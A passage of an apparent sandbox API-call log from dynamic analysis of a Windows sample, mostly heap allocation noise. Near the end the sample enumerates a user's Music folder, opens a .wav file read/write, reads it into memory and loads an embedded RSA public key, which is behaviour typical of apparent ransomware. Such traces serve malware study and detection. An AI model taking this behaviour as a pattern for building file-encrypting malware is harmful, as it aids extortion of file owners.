hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.412] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.413] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.413] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.414] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.414] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.415] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.416] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.417] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.418] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\") returned="ZxH6\\" [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2d68 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.418] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\") returned="D99YKJDL-0LajD\\" [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2d68 | out: hHeap=0xcd0000) returned 1 [0172.418] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51a18 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.418] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.418] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51a18 | out: hHeap=0xcd0000) returned 1 [0172.418] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.418] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.418] PathFindFileNameW (pszPath="") returned="" [0172.418] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.418] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fcc6d0, ftCreationTime.dwHighDateTime=0x1d5e7ad, ftLastAccessTime.dwLowDateTime=0xcbcf3fe0, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0xcbcf3fe0, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\3KR652nYn_xiX.wav") returned=".wav" [0172.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\ZxH6\\3KR652nYn_xiX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d99ykjdl-0lajd\\zxh6\\3kr652nyn_xix.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.419] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=61696) returned 1 [0172.419] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.422] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf0da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.422] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.423] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.423] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf100, lpOverlapped=0x0) returned 1 [0172.424] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.424] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.424] lstrlenA (lpString="-----BEGIN PUBLIC 